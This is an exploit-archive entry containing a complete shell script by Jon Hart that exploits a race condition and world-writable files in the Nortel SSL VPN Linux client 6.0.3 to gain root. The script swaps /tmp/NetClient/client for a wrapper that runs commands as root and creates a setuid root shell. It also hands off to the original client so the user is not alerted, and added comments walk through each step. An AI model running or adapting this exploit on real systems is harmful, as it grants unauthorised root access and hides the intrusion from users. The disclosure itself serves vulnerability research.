"Nortel SSL VPN Linux Client 6.0.3 - Local Privilege Escalation"

Author


"Jon Hart"

Platform


linux

Release date


2007-02-21

#!/bin/sh
# 
# Nortel SSL VPN Linux Client race condition
# 
# Jon Hart <jhart@spoofed.org>
#
# The Linux client that is utilized by versions prior to 6.05 of the Nortel
# SSL VPN appliance suffers from a number of problems that, in combination,
# allow an unprivileged local user to obtain root privileges.
# 
# This particular bug is as follows:
# 1) SSL VPN is initiated from the startNetdirect() javascript call
# 2) A zip archive is downloaded to the local machine which contains three
#    binaries necessary for the client: askpass, client, and surun.  This
#    archive is written to /tmp, chmod'd 777, and then it is extracted into
#    /tmp/NetClient
# 3) All of these files are chmod'd world writable by the following java
#    snippet, which is called on all UNIX client OSs:
#
#   protected boolean setPermissions(String file)
#   {
#      String command = "chmod a+xw " + file;
#      try
#      {
#         Process p = Runtime.getRuntime().exec(command);
#         p.waitFor();
#      }
#      ...
#   }
#
# 4) /tmp/NetClient/surun is executed, which in turn runs
#    /tmp/NetClient/askpass.  This process acquires the root password, and
#    then executes /tmp/NetClient/client via /bin/su and the root password.  
#
# There is clearly a bug in step 2 and 3 whereby files are installed world
# writable.  The bug I chose to exploit is the race condition in step 4,
# combined with the insecure permissions of steps 2 and 3, which (IMO),
# gives root more easily.  The risk here is if you have untrusted accounts
# on the machine from which you access the Nortel VPN, those accounts can
# easily gain local root access.
#
# The exploit is fairly simple.  Wait for /tmp/NetClient/client to appear,
# swap it for our "special version", and wait for a shell.
#
# Notes: a /tmp with nosuid will help mitigate this particular _exploit_,
# but not the vulnerability.  The same vulnerability also exists in the Mac
# client.  
#
# For education and testing purposes only.  Only run this on systems that
# you maintain/control.
#

# Remove this run's temporary files from TMP_DIR.
# Globals:  TMP_DIR (read) - temp directory resolved at top level
#           $$ - script PID embedded in every mktemp template in this file
# Also installed as the handler for HUP/INT/QUIT/TERM at top level.
cleanup() {
   # Unquoted on purpose so the pattern globs.  NOTE(review): the pattern
   # begins with a literal "." and so only matches dotfiles, while the mktemp
   # templates used in run_cmd/suid_shell (e.g. vpn_client_run-$$.XXXXXXXX)
   # have no leading dot -- confirm whether those files are actually matched.
   rm -f $TMP_DIR/.*-$$\..*
}


# Replace the world-writable client with a wrapper script and wait until the
# VPN launcher (step 4 of the header) has executed it.
# Arguments: $* - command line to embed in the wrapper script
# Globals:   CLIENT (read) - path of the client file under /tmp/NetClient
#            CMD, VPN_CLIENT_RUN, OLD_CLIENT, SUCCESS (written)
# Returns:   0 once the marker file has been removed; exits 1 otherwise
run_cmd() {
   # All arguments joined into a single string.
   CMD=$@    
   # Marker file: the wrapper deletes it, which is how this function learns
   # that the wrapper ran.
   VPN_CLIENT_RUN=`mktemp -t vpn_client_run-$$.XXXXXXXX`

   echo "Waiting for writable client"
   # Busy-wait with no sleep until the client exists and is writable by us
   # (the "chmod a+xw" from step 3 of the header).
   while (true); do
      if [ -w $CLIENT ]; then
         OLD_CLIENT=`mktemp -t old_client-$$.XXXXXXXXXX`
         echo "Saving old client"
         cp $CLIENT $OLD_CLIENT 
         chmod 755 $OLD_CLIENT
         echo "Writing new \"client\""
         # The wrapper is three lines: run CMD, remove the marker, then hand
         # off to the saved original client.
         echo "#!/bin/sh" > $CLIENT 
         echo "$CMD" >> $CLIENT
         echo "rm -f $VPN_CLIENT_RUN" >> $CLIENT
         # ensure the original client gets run so as to
         # not alert the user
         # (\$@ is escaped so the wrapper, not this script, expands it)
         echo "exec $OLD_CLIENT \$@" >> $CLIENT
         break
      fi
   done

   SUCCESS=0
   echo "Waiting for new client to be run"
   # Poll every 2s until the marker is gone.  There is no timeout and the
   # loop only exits with SUCCESS=1, so the failure branch below is
   # unreachable as written.
   while (true); do
      if [ ! -f $VPN_CLIENT_RUN ]; then
         SUCCESS=1
         break
      else
         sleep 2
      fi
   done

   if [ $SUCCESS == 1 ]; then
      echo "Success"
      return 0
   else 
      echo "Exploit failed!"
      cleanup
      exit 1
   fi
}

# Compile a small setuid(0)/setgid(0) wrapper around /bin/bash, have the
# client chown/chmod it via run_cmd, then run it once the setuid bit appears.
# Globals:   SH_C, SH, SUCCESS (written); calls run_cmd and cleanup
# Outputs:   C source at ./sh_c-$$.c (current directory, not TMP_DIR);
#            compiled binary at a mktemp path in the temp directory
# Returns:   does not return normally -- runs the shell, or exits 1
suid_shell() {
   # Relative path: the source file is written to the current directory.
   SH_C="sh_c-$$.c"

   # write out setuid shell
   # (appended with >>; the here-doc is unquoted and not <<-, so the leading
   # spaces are part of the C source, which is harmless for C)
   cat >> $SH_C << EOF
   #include <sys/types.h>
   #include <unistd.h>
   int main (int argc, char **argv) {
      setuid(0);
      setgid(0);
      execl("/bin/bash", "bash", NULL);
   }
EOF

   # try like hell to get this shell compiled
   SH=`mktemp -t vpnshell-$$.XXXXXXXXXX`
   # gcc first, then cc; all compiler output is discarded.
   gcc -o $SH $SH_C 2>&1 > /dev/null 2>&1
   if [ $? != 0 ]; then
      cc -o $SH $SH_C 2>&1 > /dev/null 2>&1
      if [ $? != 0 ]; then
         echo "Compilation of shell failed"
         echo "Trying backup method..."
         # No compiler available: ask the client to copy /bin/sh over $SH
         # and set mode 4755 instead.
         run_cmd "cp /bin/sh $SH && chmod 4755 $SH"
         # Poll once a second for the setuid bit.  No timeout, so the
         # "Failed" lines after this loop are unreachable as written.
         while (true); do
            if [ -u $SH ]; then
               $SH 
               cleanup
               exit
            else
               sleep 1
            fi
         done
         echo "Failed"
         cleanup
         exit 1
      fi
   fi
   rm -f $SH_C 

   # Have the client make the compiled binary root-owned and setuid.
   run_cmd "chown root:root $SH && chmod 4755 $SH"

   # wait for our shell to be chmod'd
   SUCCESS=0
   echo "Waiting for suid shell"
   # Up to 60 polls, 2s apart (about two minutes).  The loop variable
   # "sleep" is never read.
   for sleep in `seq 1 60`; do
      if [ -u $SH ]; then
         echo "Success! setuid shell is $SH"
         SUCCESS=1
         break
      else
         sleep 2
      fi
   done

   if [ $SUCCESS == 1 ]; then
      cleanup
      $SH
   else 
      # Timed out: remove the binary we created and give up.
      rm -f $SH
      echo "Exploit failed!"
      cleanup
      exit 1
   fi
}

# Path the Nortel client is extracted to (step 2 of the header).
CLIENT="/tmp/NetClient/client"

# If a client is already present, ask it to stop and wait up to ~60s for
# the file to go away (the loop variable "sleep" is never read).
if [ -f $CLIENT ]; then
   echo "client $CLIENT already exists -- forcing stop"
   $CLIENT --stop
   for sleep in `seq 1 60`; do
      if [ ! -f $CLIENT ]; then
         break
      fi
      sleep 1
   done
fi

# hack to figure out where temp files get put...
# (a throwaway file is created only so its directory can be recorded in
# TMP_DIR for cleanup; it is deleted immediately)
TMP_FILE=`mktemp -t $$`
TMP_DIR=`dirname $TMP_FILE`
rm -f $TMP_FILE

# Run cleanup on HUP, INT, QUIT and TERM.
trap cleanup 1 2 3 15

# two modes of operation -- get a root shell, or run a cmd as root.
# Only the first argument is used, and it is expanded unquoted.
if [ -z "$1" ]; then
   suid_shell
else 
   run_cmd $1 
fi

cleanup

# milw0rm.com [2007-02-21]